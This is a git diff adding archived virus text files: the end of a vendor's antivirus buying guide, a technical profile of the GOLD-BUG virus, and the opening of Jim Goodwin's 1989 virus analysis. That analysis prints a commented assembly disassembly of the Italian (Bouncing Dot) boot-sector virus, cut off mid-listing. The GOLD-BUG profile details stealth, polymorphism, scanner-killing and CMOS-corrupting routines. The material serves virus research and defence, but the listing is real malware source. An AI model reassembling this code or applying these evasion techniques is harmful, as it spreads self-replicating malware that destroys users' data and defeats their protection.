+     ie: Run  the program on a "diskette only" computer, and keep
+          a write-protect tab on your "System Disk."
+
+         Run  the   program  with   "Virus  Protection"  software
+          installed.
+
+5.  Establish and maintain a sound Back-Up policy.
+
+     DO  NOT   USE  ONLY  ONE  SET  OF  BACK-UP  DISKS  THAT  ARE
+     CONTINUOUSLY WRITTEN OVER.
+
+     Use at least three complete sets of back-up disks that are
+      rotated in a regular cycle.
+
+
+DO YOU  NEED SOME  FORM OF PROTECTION FROM VIRUSES?
+
+It couldn't hurt !!!  You do lock the door to your home
+  when you go out, right?
+
+Plan in advance the methods you'll use to ward off virus attacks.
+It's a  far more  effective use  of management  time to establish
+preventative  measures  in  a  calm environment instead of making
+panic decisions after a virus attack has occurred.
+
+
+IS THERE ANY SOLUTION AVAILABLE THAT'S ABSOLUTELY FOOLPROOF?
+
+No !!!
+
+Any  security  system  can  be  broken  by  someone dedicated and
+knowledgeable enough to put forth the effort to break the system.
+
+
+WHAT LEVEL OF PROTECTION DO YOU NEED?
+
+This of course depends on many factors, such as:
+
+     1. The sensitivity of the data on your PC's.
+     2. The number of personnel having access to your PC's.
+     3. The security awareness of computing personnel.
+     4. The skill levels of computing personnel.
+     5. Attitudes, ethics, and morale of computing personnel.
+
+A key point of consideration is the threshold  for the  amount of
+security you can use versus its impact on normal productivity.
+
+Human nature  must also  be considered. If you were to install 10
+locks on your front door and it cost you 5 minutes each  time you
+enter  your  home,  I'll  bet  that  the  first  time  that  it's
+raining... and you have 3 bags of groceries... you'll go  back to
+using the one lock you always used.
+
+
+HOW CAN A SOFTWARE PRODUCT PROTECT AGAINST VIRUSES?
+
+There are several approaches that have been developed.
+
+One form  is an "inoculation" or "signature" process, whereby the
+key files on a disk are marked in a special  way and periodically
+checked to see if the files have been changed.  Depending on the
+way in which this is implemented, this method can actually interfere
+with programs that have built-in integrity checks.
+
+Another method  is to  "Write Protect"  specific key areas of the
+disk so that no software is permitted to change the data in those
+places.
+
+We  at  RG  Software  Systems,  Inc.  believe  that  preventative
+measures are the most effective. The Disk Watcher system provides
+multiple lines  of defense:  A "Batch" type program automatically
+checks all active disk drives for the presence  of certain hidden
+virus  characteristics  when  the  computer is started, and a TSR
+(Terminate and Stay Resident) program monitors  ongoing disk
+activity  throughout  all processing. The "Batch" program
+can also be run on demand at any time to check the disk in a
+specific drive.
+
+The TSR program, in addition to its other "Disaster
+Prevention" features, contains a series of proprietary algorithms
+that detect the behavior characteristics of a myriad of virus
+programs, and yet produce minimal  overhead in processing time
+and "false alarm" reports. Disk  Watcher is uniquely able to tell
+the difference between legitimate IO  activity and  the IO activity
+of a virus program.
+
+When an action occurs indicative of a virus attempting to reproduce itself;
+alter  another program; set itself up  to be  automatically run  the next
+time the system is started; or attempting to perform a massively damaging
+act; Disk Watcher  will  automatically  "pop  up."  The user will then have
+several options, one of which is to immediately stop the computer before any
+damage can be done. Detection occurs BEFORE the action takes place.
+
+Other options allow the user to tell Disk Watcher to continue the
+application program  and remember  that this program is permitted
+to perform the action that triggered the "pop up."
+
+   Some very important features of Disk Watcher are:
+
+   Whenever the user selects the "Stop the Computer" option, the
+   Application screen image and the Disk Watcher screen image will be
+   sent to the system printer before the machine is stopped, so that
+   an effective analysis of the problem may be done.
+
+   Disk Watcher performs an integrity check on itself whenever it runs.
+
+The  "Destructive"   viruses   that   produce   "selective"  file
+destruction or  "Random Havoc"  are the  most difficult to defend
+against. The best measures are to prevent them  from getting into
+the system in the first place.
+
+
+WHICH VIRUS PROTECTION PACKAGE IS RIGHT FOR YOU?
+
+Since the first reports of virus attacks appeared in the press, a
+number of  "Virus Prevention"  products have  quickly appeared on
+the market, produced by companies wishing to take  advantage of a
+unique market  opportunity. This  is to  be expected. RG Software
+Systems, Inc. is one of them with our Disk Watcher product.
+
+It should be pointed out, however, that as of this  writing, only
+a  little  over  2  months  has  transpired since the first major
+stories appeared.
+
+Those companies  that have  had to  build a  product from scratch
+during  this  limited  amount  of  time  have  had  to design the
+defensive  system,  write  the  program  code,  write  the user's
+manual,  design  the  packaging,  "Alpha"  test, "Beta" test, and
+bring their product through manufacturing to market. A monumental
+task in a miraculously short period of time.
+
+Companies that have had products on the market that include virus
+protection, or  products  that  were  enhanced  to  include virus
+protection, such  as Disk  Watcher, have had extra time and field
+experience for the stabilization of their products.
+
+As a  professional in  this industry,  I sincerely  hope that the
+quickly developed products are stable in their released form.
+
+The evaluation points listed below are usually applied as a
+standard for all types of software products:
+
+
+         *Price
+         *Performance
+         *Ease of Use
+         *Ease of Learning
+         *Ease of Installation
+         *Documentation
+         *Copy Protection
+         *Support
+
+A "Virus Protection" package, like a security system for your
+home, requires a close scrutiny.  You want the system to do the
+job unobtrusively, and yet be effective.
+
+TWELVE SPECIAL CONSIDERATIONS FOR VIRUS PROTECTION PACKAGES:
+
+1.  Amount  of  impact  the  package  may have on your computer's
+     performance.
+
+     If the package is  "RAM Resident,"  does it  noticeably slow
+          down your machine's operations?
+     If so,  with what type of operation?  Are program start-
+          ups slowed? Are database operations slowed?
+
+
+2. Level of dependency on operator intervention.
+
+     Does the package require  the  operator  to  perform certain
+          tasks  on  a  regular  basis  in  order  for  it  to be
+          effective? (Such as only checking for  virus conditions
+          on command.)
+     Does  the  package  require  much  time  to install and keep
+          operational?  ie:  Each  time   any  new   software  is
+          installed on the system, must the protection package be
+          used?
+
+3. Impact on productivity... Annoyance level.
+
+     Does the package periodically stop processing and/or require
+          the  operator  to  take  some  action.  If so, does the
+          package have any capability  to  learn  its environment
+          and stop its interference?
+
+4. False alarms.
+
+     How  does  the  package  handle situations that appear to be
+          viruses but are legitimate  actions made  by legitimate
+          programs?
+     Are there  situations where  legitimate jobs will have to be
+          re-run  or  the  system   re-booted   because   of  the
+          protection package? How frequently will this occur?
+     How  much  additional  end-user  support  will  the  package
+          require?
+
+5. The probability that the package will remain in use?
+
+     Will there  be any  interference or  usage requirements that
+          will  discourage  the  user  from  keeping  the package
+          active? (It won't be  effective if  they quickly desire
+          to  de-install  it  and  perhaps  only pretend they are
+          using it when management is present.)
+
+6. Level of effectiveness it provides in combatting viruses.
+
+     Will it be effective  against  viruses  produced  by someone
+          with an experience level of:
+
+          Level 1 - "Typical End User"? (Basic knowledge of using
+                      applications and DOS commands.)
+          Level 2 - "Power  User"?   (Knowledge  of  DOS  Command
+                      processor, Hardware functions, BASIC
+                      programming, etc.)
+          Level 3 - "Applications  Programmer"?  (Knowledge of
+                      programming languages and DOS service calls.)
+          Level 4 - "Systems  Engineer"?  (Knowledge  of  DOS and
+                      Hardware internal functions.)
+          Level 5 -  "Computer  Science  Professor  that develops
+                         viruses for research purposes"?
+
+     Which types of intrusion will it be effective against?
+
+          "Covert Entry"?
+          "Overt Entry"?
+
+     Does  it  detect  a  virus  attempting  to spread or "clone"
+          itself?
+
+     Does it  detect a  virus attempting  to place  itself into a
+          position to be automatically run?
+
+     If  a  virus  gets  into  the computer, which types of virus
+          damage will it detect?
+
+          "Massive Destruction"
+          "Partial Destruction"
+          "Selective Destruction"
+          "Random Havoc Destruction"
+          "Annoyance"
+
+     Does the software detect a  virus  before  or  after  it has
+          infected a program or made its attack?
+
+     Does the publisher claim total protection from all viruses?
+
+
+7. Does the software provide any assistance for "post mortem"
+    analysis of suspected problems?
+
+     ie:  If a virus symptom is detected and the computer is
+     brought to a halt, is there any supporting information
+     for analyzing the problem other than the operator's
+     recall of events?
+
+
+8. Impact on your machine's resources.
+
+     How much RAM is used?
+     Is any special hardware required?
+
+
+9. Is the product compatible with:
+
+     Your hardware configuration.
+     Your Operating system version.
+     Your network.
+     Other software that you use, especially TSR's.
+
+10.  Can  the  package  be  used  by  current computing personnel
+     without substantial training?
+
+     What type of computing experience is required to install the
+          package?
+
+11. Background of the publisher.
+
+     References...  Who  is  using  this  or  other products from
+          this publisher?  How is  this company  perceived by its
+          customers? The press?
+
+     How long has the publisher been in business?
+
+     Was  the   product  Beta  Tested?...  By  valid,  well-known
+          organizations or by friends of the company's owner?
+
+     Was  the  product   tested   against   any   known  viruses?
+          Successfully?
+
+     What about on-going support? In what form? At what cost?
+
+     Does the company plan to upgrade its product periodically?
+
+     What is the upgrade policy? Expected costs?
+
+12. Does  the package  provide any  other useful  benefits to the
+     user besides virus protection?
+
+
diff --git a/textfiles.com/virus/gold-bug.txt b/textfiles.com/virus/gold-bug.txt
new file mode 100644
index 00000000..b40d568e
--- /dev/null
+++ b/textfiles.com/virus/gold-bug.txt
@@ -0,0 +1,161 @@
+Virus Name:  GOLD-BUG
+Aliases:     AU, GOLD, GOLD-FEVER, GOLD-MINE
+V Status:    New, Research
+Discovery:   January, 1994
+Symptoms:    CMOS checksum failure; Creates files with no extension; Modem
+	     answers on 7th ring; BSC but it is hidden; Most virus scanners
+	     fail to run or are Deleted; CHKLIST.??? files deleted.
+Origin:      USA
+Eff Length:  1,024 Bytes
+Type Code:   SBERaRbReX - Spawning Color Video Resident and Extended HMA
+	     Memory Resident Boot-Sector and Master-Sector Infector
+Detection Method:  None
+Removal Instructions:  See Below
+
+General Comments:
+
+	GOLD-BUG is a memory-resident multipartite polymorphic stealthing
+	boot-sector spawning anti-antivirus virus that works with DOS 5 and
+	DOS 6 in the HIMEM.SYS memory.  When an .EXE program infected with the
+	GOLD-BUG virus is run, it determines if it is running on an 80186 or
+	better, if not it will terminate and not install.  If it is on an
+	80186 or better it will copy itself to the partition table of the hard
+	disk and remain resident in memory in the HMA (High Memory Area) only
+	if the HMA is available, ie. DOS=HIGH in the CONFIG.SYS file else no
+	infection will occur.  The old partition table is moved to sector 14
+	and the remainder of the virus code is copied to sector 13.  The virus
+	then executes the spawned associated file if present.  INT 13 and
+	INT 2F are hooked into at this time but not INT 21.  The spawning
+	feature of this virus is not active now.
+
+	When the computer is rebooted, the virus goes memory resident in the
+	color video memory.  Also at this time the GOLD-BUG virus removes
+	itself from the partition table and restores the old one back.  Unlike
+	other boot-sector infectors, it does not use the top of memory to
+	store the code.  CHKDSK does not show a decrease in available memory.
+	At this time it only hooks INT 10 and monitors when the HMA becomes
+	available.  Once DOS moves into the HMA, then GOLD-BUG moves into the
+	HMA at address FFFF:FB00 to FFFF:FFFF.  If the HMA never becomes
+	available, ie. DOS loaded LOW or the F5 key hit in DOS 6 to bypass the
+	CONFIG.SYS, then the virus clears itself from the system memory when
+	the computer changes into graphics mode.  If it moves to the HMA, it
+	hooks INT 13, INT 21 and INT 2F and then rewrites itself back to the
+	partition table.  The GOLD-BUG virus also has some code that stays
+	resident in the interrupt vector table to always make the HMA
+	available to the virus.  The full features of the virus are now
+	active.
+
+	The GOLD-BUG virus will infect the boot sector of 1.2M diskettes.
+	The virus copies itself to the boot sector of the diskette and moves
+	a copy of the boot sector to sector 28 and the remainder of the code
+	is copied to sector 27.  These are the last 2 sectors of the 1.2M disk
+	root directory.  If there are file entries on sector 27 or 28 it will
+	not overwrite them with the virus code.  It will infect 1.2M disks in
+	drive A: or B:  If a clean boot disk is booted from drive A: and you
+	try to access C: you will get an invalid drive specification.
+
+	The boot-sector infection is somewhat unique.  If the computer is
+	booted with a disk that contains the GOLD-BUG virus, it will remain in
+	video memory until the HMA is available and then infect the hard disk.
+	Also at this time, it will remove itself from the 1.2M disk.  The
+	virus will never infect this disk again.  It makes tracking where you
+	got the virus from difficult in that your original infected disk is
+	not infected anymore.
+
+	If an .EXE file less than 64K and greater then 1.5K is executed,
+	GOLD-BUG will randomly decide to spawn a copy of it.  The .EXE file is
+	renamed to the same file name with no extension, ie. CHKDSK.EXE
+	becomes CHKDSK.  The original file attributes are then changed to
+	SYSTEM.  An .EXE file with the same name is created.  This .EXE file
+	has the same length, file date and attributes as the original .EXE
+	file.  This spawning process will not make a copy on a diskette
+	because it might be write protected and be detected; but it will make
+	a spawn .EXE file on a network drive.  When a spawned file is created,
+	CHKLIST.??? of the current directory is also deleted.  The .EXE file
+	that is created is actually a .COM file; it has no .EXE header.
+
+	The GOLD-BUG virus is very specific as to what type of .EXE files it
+	will spawn copies.  It will not spawn any Windows .EXE files or any
+	other .EXE files the use the new extended .EXE header except those
+	that use the PKLITE extended .EXE header.  This way all Windows
+	programs will continue to run and the virus will still be undetected.
+
+	The GOLD-BUG virus is also Polymorphic.  Each .EXE file it creates
+	only has 2 bytes that remain constant.  It can mutate into 128
+	different decription patterns.  It uses a double decription technique
+	that involves INT 3 that makes it very difficult to decript using a
+	debugger.  The assembly code allowed for 512 different front-end
+	decripters.  Each of these can mutate 128 different ways.
+
+	The GOLD-BUG virus incorporates an extensive steathing technique.  Any
+	time the hard disk partition table or boot sector of an infected
+	diskette is examined, the copy of the partition table or boot sector
+	is returned.  If a spawned .EXE file is opened to be read or executed;
+	the GOLD-BUG virus will redirect to the original file.  Windows 3.1
+	will detect a resident boot-sector virus if the "Use 32 Bit Access" is
+	enabled on the "Virtual Memory" option.  GOLD-BUG will disconnect
+	itself from the INT 13 chain when Windows installs and reconnect when
+	Windows uninstalles to avoid being detected.  When Windows starts, the
+	GOLD-BUG virus will copy the original hard disk partition table back.
+	When Windows ends, the GOLD-BUG virus will reinfect the partition
+	table.
+
+	The GOLD-BUG virus also has an extensive anti-antivirus routine.  It
+	can install itself with programs like VSAFE.COM and DISKMON.EXE
+	resident that monitor changes to the computer that are common for
+	viruses.  It writes to the disk using the original BIOS INT 13 and not
+	the INT 13 chain that these types of programs have hooked into.  It
+	hooks into the bottom of the interrupt chain rather than changing and
+	hooking interrupts; very similar to the tunneling technique.  If the
+	GOLD-BUG virus is resident in memory, any attempts to run most virus
+	scanners will be aborted.  GOLD-BUG stops any large .EXE file
+	(greater than 64k) with the last two letters of "AN" to "AZ".  It will
+	stop SCAN.EXE, CLEAN.EXE, NETSCAN.EXE, CPAV.EXE, MSAV.EXE, TNTAV.EXE,
+	etc., etc.  The SCAN program will either be deleted or an execution
+	error will return.  Also, GOLD-BUG will cause a CMOS checksum failure
+	to happen next time the system boots.  GOLD-BUG also erases
+	"CHKLIST.???" created by CPAV.EXE and MSAV.EXE.  Programs that do an
+	internal checksum on themselves will not detect any changes.  The
+	Thunder Byte Antivirus programs contain a partition table program that
+	claims it can detect all partition table viruses.  GOLD-BUG rides
+	right through the ThunderByte partition virus checker.
+
+	The GOLD-BUG virus detects a modem.  If you received an incoming call
+	on the modem line, GOLD-BUG will output a string that will set the
+	modem to answer on the seventh ring.
+
+	If a program tries to erase the infected .EXE file, the original
+	program and not the infected .EXE file is erased.
+
+	The text strings "AU", "1O7=0SLMTA", and "CHKLIST????" appear in the
+	decripted code.  The virus gets it name from "AU", the chemical
+	element "GOLD".  The text string "CHKLIST????" is actually executable
+	code.
+
+	The GOLD-BUG virus has two companion viruses that it works with.  The
+	DA'BOYS virus is also a boot-sector infector.  It is possible to have
+	a diskette with two boot-sector viruses.  GOLD-BUG hides the presence
+	of the DA'BOYS virus from the Windows 3.1 startup routine.  GOLD-BUG
+	removes the DA'BOYS virus from the INT 13 chain at the start of
+	Windows and restores it when Windows ends.  The GOLD-BUG virus works
+	with the XYZ virus; it reserves the space FFFF:F900 to FFFF:FAFF in
+	the HMA for the XYZ virus so it can load as well.
+
+	To remove the GOLD-BUG virus, change DOS=HIGH to DOS=LOW in the
+	CONFIG.SYS, then reboot.  Once the system comes up again, reboot from
+	a clean boot disk.  The Virus has now removed itself from the
+	partition table and memory.  With the ATTRIB command check for files
+	with the SYSTEM bit set that don't have any extension.  Delete the
+	.EXE file associated with the SYSTEM file.  Using ATTRIB remove the
+	SYSTEM attribute.  Rename the file with no extension to an .EXE file.
+	Format each diskette or run SYS to remove the virus from the boot
+	sector of each 1.2M disk.  Any spawned .EXE files copied to diskette
+	need to be deleted.
+
+	Several variations of this virus can exist.  The assembly code allowed
+	for 14 features to be turned on or off:  Delete Scanners, Check for
+	8088, Infect at Random, Deflect Delete, CMOS Bomb, File Reading
+	Stealth, Same File Date, Double Decription, Execute Spawned, Modem
+	Code, Anti-Antivirus, Polymorphic, Multipartite and 720K or 1.2M
+	Diskette Infection.  Some of these features can be disabled and more
+	code added to change the characteristics of this virus.
diff --git a/textfiles.com/virus/goodwin.txt b/textfiles.com/virus/goodwin.txt
new file mode 100644
index 00000000..02dbb093
--- /dev/null
+++ b/textfiles.com/virus/goodwin.txt
@@ -0,0 +1,3516 @@
+	The following document is copyrighted by Jim Goodwin, 1989.  It may be
+copied and distributed freely, as long as no changes are made.  For further
+information or comments, I may be contacted on the Bulletin Board Society's
+Homebase board - (408) 988 4004.  Additional virus analyses are currently
+being finalized and the results will be published in future versions of this
+document.  
+                                     Jim Goodwin - April 7, 1989 
+ 
+
+
+            AN ANALYSIS OF COMPUTER VIRUS STRUCTURES
+
+
+	There has been much disagreement within the virus research community
+about the wisdom of distributing detailed information about viruses,
+including disassemblies of viruses.  Some would say that virus disassemblies
+can be easily re-assembled and returned to a live state; that they show
+people how to write viruses or that they give people ideas that they would
+not otherwise have.  The opposing view holds that detailed information must
+be shared freely in order to effectively combat the virus spread.  Proponents
+of shared information point out that hundreds of people are re-inventing the
+wheel by disassembling viruses that have already been disassembled many
+times over.  They argue that it does not take a disassembly to enable someone
+to write a virus; that anyone with even a moderate understanding of
+programming can do so, and that live viruses are so common that anyone
+wishing to obtain one can easily get their hands on one.
+	I very strongly favor the free information viewpoint.  It is clear that
+we, as a user community, are suffering greatly from a lack of concrete
+knowledge.  PC Magazine, as the prime example of this lack of knowledge,
+performed an evaluation of antiviral products in its April issue that is
+shocking to anyone with even a remote understanding of viruses.  The products
+chosen were the TSR type of prevention products (Class I products in CVIA
+terminology), and these products are universally known to be practically
+useless.  They were tested against only three viruses, none of them boot
+sector infectors (since TSR type products cannot possibly prevent such
+infections), in spite of the fact that boot infectors account for over 75%
+of all infection occurrences.  The editor's choice was Flu-shot and, while
+I have nothing against Greenberg or his programming skills, the product, like
+all TSRs, is almost completely ineffective.  Even a child could write a virus
+to evade the interrupt vectoring capabilities of TSRs in a DOS environment. 
+These and other circumstances make it obvious that we are in desperate need
+of education.
+	I have disassembled dozens of viruses, and I now know that it takes no
+specialized knowledge to write a virus.  Literally anyone can write one.  The
+concept is absurdly simple, understood by even beginning programmers.  We
+have merely surrounded the virus issue with an air of mystique that makes it
+appear that there is some magic formula that must be guarded from the crowd
+of people waiting to write viruses.  This is total nonsense.  There is no
+magic.  There is no subtlety.  A program is merely written that copies itself
+and attaches itself to another program.  If this is the secret we are trying
+to protect, then we have become foolish.
+	The truth is, we need to study and disseminate existing virus structures
+far more than we need to hide them from crackers.  A cracker gains little
+from a disassembly.  A researcher attempting to write a disinfectant program,
+on the other hand, gains a great deal.  The cracker is the only person who
+gains from the existing atmosphere of restricted information flow.  If few
+people know the internals of a virus, then there is little likelihood that
+an effective remedy for the virus will be forthcoming.  If many people have
+access, then one or more will certainly develop an identification and removal
+product.
+	I also want to point out that full virus disassemblies have previously
+been published in at least three books and  four international magazines with
+no known ill effects, and a great deal of positive support from readers.
+	I do not expect the previous brief discussion will change the minds of
+those people who insist on a restricted flow of detailed information.  I do
+hope, however, that those of you who have been shy about your own desires to
+open up and share information, will take heart and pass on the enclosed
+disassemblies to those people that you feel might benefit from them.
+	I would like to take this opportunity to give my heartfelt thanks to
+John McAfee (who mildly disagrees with my approach) for his tireless efforts
+to collect and classify viruses from multiple computer architectures.  His
+work, more than any others, has inspired me to give my all to this effort. 
+I would also like to recognize the excellent collective work of the Computer
+Virus Industry Association, for their concise analysis of antiviral measures
+and their overwhelming contribution to my collection of 60 odd viruses. 
+Neither John nor the Association, by the way, is in any way responsible for
+my publication and distribution of this document.  I take sole and full
+responsibility.
+
+
+
+			    			THE VIRUSES
+
+*************************************************************************
+-------------------------------------------------------------------------
+-------------------------------------------------------------------------
+*************************************************************************
+
+The "Italian Virus"
+Also Called - Bouncing Dot, Vera Cruz and Missouri virus.
+
+   ; ORIGININ ADDRESS -7C00H 
+
+ 
+RAM   SEGMENT AT 0
+
+   ; SYSTEM DATA
+
+   ORG   20H
+INT8OF   DW ?        ; INTERRUPT 8 OFFSET
+INT8SG   DW ?        ; INTERRUPT 8 SEGMENT
+   ORG   4CH
+INT19O   DW ?        ; INTERRUPT 19 OFFSET
+INT19S   DW ?        ; INTERRUPT 19 SEGMENT
+   ORG   413H
+RAMSIZ   DW ?        ; TOTAL RAM SIZE
+
+   ; BPB OF VIRUS BOOT RECORD
+
+   ORG   7C0BH
+BYPSEC   DW ?        ; BYTES PER SECTOR
+NUMSEC   DB ?        ; SECTORS PER ALLOCATION UNIT
+SECRES   DW ?        ; RESERVED SECTORS
+FATNUM   DB ?        ; NUMBER OF FATS
+DIRNUM   DW ?        ; NUMBER OF ROOT DIR ENTRIES
+SECNUM   DW ?        ; NUMBER OF SECTORS
+MEDIAD   DB ?        ; MEDIA DESCRIPTOR
+SECFAT   DW ?        ; NUMBER OF SECTORS PER FAT
+SECTRK   DW ?        ; SECTORS PER TRACK
+HEDNUM   DW ?        ; NUMBER OF HEADS
+HIDSEC   DW ?        ; NUMBER OF HIDDEN SECTORS (LOW ORDER)
+
+   ; INTERRUPT 19 (13H) BRANCH ADDRESS
+
+   ORG   7D2AH
+
+ORIG19   DW ?        ; ORIGINAL INT 19 OFFSET
+ORG19S   DW ?        ; ORIGINAL INT 19 SEGMENT
+
+   ; INSTALLATION DATA AREA
+
+   ORG   7DF3H
+CURFAT   DW ?     ; CURRENT FAT 
+CURCLS   DW ?     ; SECTOR NUMBER OF FIRST CLUSTER
+SWITCH   DB ?     ; SWITCHES
+            ;          - 01H - NESTED INTERRUPT
+            ;          - 02H - TIMER INTERRUPT 
+            ;          - 04H - 16-BIT FAT
+LSTDRV   DB ?     ; LAST DRIVE USED
+REMAIN   DW ?     ; SECTOR NUMBER OF REST OF CODE
+RESERV   DB ?     ; RESERVED SPACE FOR FUTURE HACKING
+FLAG01   DW ?     ; FLAG FIELD
+
+   ; DATA AREA
+
+   ORG   7EB0H
+LASTTM   DW ?        ; SYSTEM TIME LAST CALLED
+PRCFAT   DB ?        ; PROCESSED FAT / 256
+
+   ; INTERRUPT 8 BRANCH ADDRESS
+
+   ORG   7FC9H
+ORG08O   DW ?        ; ORIGINAL INT 8 OFFSET
+ORG08S   DW ?        ; ORIGINAL INT 8 SEGMENT
+
+   ; DISPLAY DATA AREA
+
+   ORG   7FCDH
+CHARAT   DW ?        ; CHARACTER AND ATTRIBUTES
+ROWCOL   DW ?        ; ROW AND COLUMN POSITIONS
+ROWCLM   DW ?        ; ROW AND COLUMN MOVEMENT
+GRAPHM   DB ?        ; GRAPHICS MODE SWITCH
+MODEAP   DW ?        ; MODE AND ACTIVE PAGE
+COLUMN   DB ?        ; VISIBLE COLUMNS - 1
+
+   ; BPB OF ORIGINAL BOOT RECORD
+
+   ORG   800BH
+BIPSEC   DW ?        ; BYTES PER SECTOR
+ALCSEC   DB ?        ; SECTORS PER ALLOCATION UNIT
+VERVED   DW ?        ; RESERVED SECTORS
+RUMNUM   DB ?        ; NUMBER OF FATS
+ROTRID   DW ?        ; NUMBER OF ROOT DIR ENTRIES
+NUOSEC   DW ?        ; NUMBER OF SECTORS
+MIASET   DB ?        ; MEDIA DESCRIPTOR
+FASNUM   DW ?        ; NUMBER OF SECTORS PER FAT
+TRASSC   DW ?        ; SECTORS PER TRACK
+NUOHED   DW ?        ; NUMBER OF HEADS
+HIDESC   DW ?        ; NUMBER OF HIDDEN SECTORS (LOW ORDER)
+
+
+   ORG   81F5H
+FSTCLS   DW ?        ; SECTOR NUMBER OF FIRST CLUSTER
+SWITCB   DB ?        ; SWITCHES - 01H - NESTED INTERRUPT
+         ;             - 02H - TIMER INTERRUPT INSTALLED
+         ;             - 04H - 16-BIT FAT
+LASTUS   DB ?        ; DRIVE LAST USED
+REMAI2   DW ?        ; SECTOR NUMBER OF REST OF CODE
+LATER2   DB ?        ; TYPE SWITCH
+LATER3   DW 2 DUP (?)	 ; INSTALLED.. HMMM?
+
+
+RAM   ENDS
+
+CODE  SEGMENT BYTE PUBLIC 'CODE'
+   ASSUME CS:CODE,DS:RAM
+
+START:  
+   JMP   HIDE_ME_PLEASE      ; BRANCH ROUND BPB TABLE
+
+   DB 'MSDOS3.2'     ; OEM AND VERSION
+
+   DW 512      ; BYPSEC - BYTES PER SECTOR
+   DB 2        ; NUMSEC - SECTORS PER ALLOCATION UNIT
+   DW 1        ; SECRES - RESERVED SECTORS
+   DB 2        ; FATNUM - NUMBER OF FATS
+   DW 112      ; DIRNUM - NUMBER OF ROOT DIR ENTRIES
+   DW 720      ; SECNUM - NUMBER OF SECTORS
+   DB 0FDH     ; MEDIAD - MEDIA DESCRIPTOR
+   DW 2        ; SECFAT - NUMBER OF SECTORS PER FAT
+   DW 9        ; SECTRK - SECTORS PER TRACK
+   DW 2        ; HEDNUM - NUMBER OF HEADS
+   DW 0        ; HIDSEC - NUMBER OF HIDDEN SECTORS (LOW ORDER)
+
+   ; START OF PROCESSING
+
+   ; HIDE 2K OF RAM FROM SYSTEM AND MOVE INTO THIS HIDDEN AREA
+
+HIDE_ME_PLEASE: 
+   XOR   AX,AX
+   MOV   SS,AX       ; STACK SEGMENT ZERO
+   MOV   SP,7C00H    ; SET STACK POINTER TO START OF BUFFER
+   MOV   DS,AX       ; DATA SEGMENT ZERO
+   MOV   AX,RAMSIZ   ; GET TOTAL RAM SIZE
+   SUB   AX,2        ; SUBTRACT 2K
+   MOV   RAMSIZ,AX   ; REPLACE AMENDED RAM SIZE
+   MOV   CL,6        ; NUMBER OF POSITIONS TO SHIFT
+   SHL   AX,CL       ; MULTIPLY RAM SIZE BY 64 (SEGMENT ADDRESS)
+   SUB   AX,7C0H     ; SUBTRACT BUFFER OFFSET
+   MOV   ES,AX       ; SET TARGET SEGMENT ADDRESS
+   MOV   SI,7C00H    ; LOAD BUFFER TARGET OFFSET
+   MOV   DI,SI       ; COPY OFFSET FOR SOURCE
+   MOV   CX,0100H    ; NUMBER OF WORDS TO MOVE
+   REPZ  MOVSW       ; DUPLICATE BOOT SECTOR IN HIGH STORAGE
+;  MOV   CS,AX       ; LOAD SEGMENT OF NEW LOCATION
+                     ; THIS IS THE ILLEGAL OPCODE!
+   DB 08EH, 0C8H     ; PREVIOUS COMMAND HARD CODED
+
+   ; FROM THIS POINT ON WILL BE RUNNING IN HIGH STORAGE
+
+   PUSH  CS             ; \ SET DS EQUAL TO CS
+   POP   DS             ; /
+   CALL  SET_IT_UP
+SET_IT_UP: 
+   XOR   AH,AH          ; INITIALISE DISK SUB-SYSTEM
+   INT   13H            ; DISK INTERRUPT
+   AND   LSTDRV,80H     ; SET ADDRESS FOR HARD DISK
+   MOV   BX,REMAIN      ; GET SECTOR OF REST OF CODE
+   PUSH  CS             ; \ GET CURRENT SEGMENT
+   POP   AX             ; /
+   SUB   AX,20H         ; ADDRESS BACK ONE SECTOR
+   MOV   ES,AX          ; SET BUFFER SEGMENT FOR REST OF CODE
+   CALL  READ_IT_IN         ; READ REST OF CODE
+   MOV   BX,REMAIN      ; GET SECTOR OF REST OF CODE
+   INC   BX             ; ADDRESS TO BOOT SECTOR STORE
+   MOV   AX,0FFC0H      ; WRAP-AROUND ADDRESS (= -400H)
+   MOV   ES,AX          ; SET BUFFER SEGMENT FOR BOOT SECTOR
+   CALL  READ_IT_IN         ; READ REAL BOOT SECTOR
+   XOR   AX,AX
+   MOV   SWITCH,AL      ; SET OFF ALL SWITCHES
+   MOV   DS,AX          ; DATA SEGMENT ZERO
+   MOV   AX,INT19O      ; SAVE INT 19 OFFSET
+   MOV   BX,INT19S      ; SAVE INT 19 SEGMENT
+   MOV   INT19O,OFFSET INT_19+7C00H ; NEW INT 19 OFFSET
+   MOV   INT19S,CS      ; NEW INT 19 SEGMENT
+   PUSH  CS             ; \ SET DS EQUAL TO CS
+   POP   DS             ; /
+   MOV   ORIG19,AX      ; STORE OLD INT 19 OFFSET
+   MOV   ORG19S,BX      ; STORE OLD INT 19 SEGMENT
+   MOV   DL,LSTDRV      ; GET DRIVE NUMBER
+   DB 0EAH              ; FAR JUMP TO BOOT SECTOR
+   DW 7C00H, 0
+
+WRITE_IT_OUT: 
+   MOV   AX,301H     ; WRITE ONE SECTOR
+   JMP   SHORT GET_SECTOR
+
+READ_IT_IN: 
+   MOV   AX,201H     ; READ ONE SECTOR
+GET_SECTOR: 
+   XCHG  BX,AX       ; MOVE SECTOR NUMBER TO AX
+   ADD   AX,HIDSEC   ; ADD HIDDEN SECTORS
+   XOR   DX,DX       ; CLEAR FOR DIVISION
+   DIV   SECTRK      ; DIVIDE BY SECTORS PER TRACK
+   INC   DL          ; ADD ONE TO ODD SECTORS
+   MOV   CH,DL       ; SAVE SECTOR NUMBER
+   XOR   DX,DX       ; CLEAR FOR DIVISION
+   DIV   HEDNUM      ; DIVIDE BY NUMBER OF HEADS
+   MOV   CL,6        ; POSITIONS TO MOVE
+   SHL   AH,CL       ; MOVE TOP TWO BITS OF TRACK
+   OR    AH,CH       ; MOVE IN SECTOR NUMBER
+   MOV   CX,AX       ; MOVE TO CORRECT REGISTER
+   XCHG  CH,CL       ; ..AND CORRECT POSITION IN REG
+   MOV   DH,DL       ; MOVE HEAD NUMBER
+   MOV   AX,BX       ; RECOVER CONTENTS OF AX
+BRING_IN: 
+   MOV   DL,LSTDRV   ; GET DRIVE NUMBER
+   MOV   BX,8000H    ; SET BUFFER ADDRESS
+   INT   13H         ; DISK INTERRUPT
+   JNB   GO_BACK     ; BRANCH IF NO ERRORS
+   POP   AX
+GO_BACK:
+   RET
+
+   ; INTERRUPT 19 (13H) (DISK) ROUTINE
+
+INT_19: 
+   PUSH  DS
+   PUSH  ES
+   PUSH  AX
+   PUSH  BX
+   PUSH  CX
+   PUSH  DX
+   PUSH  CS             ; \ SET DS EQUAL TO CS
+   POP   DS             ; /
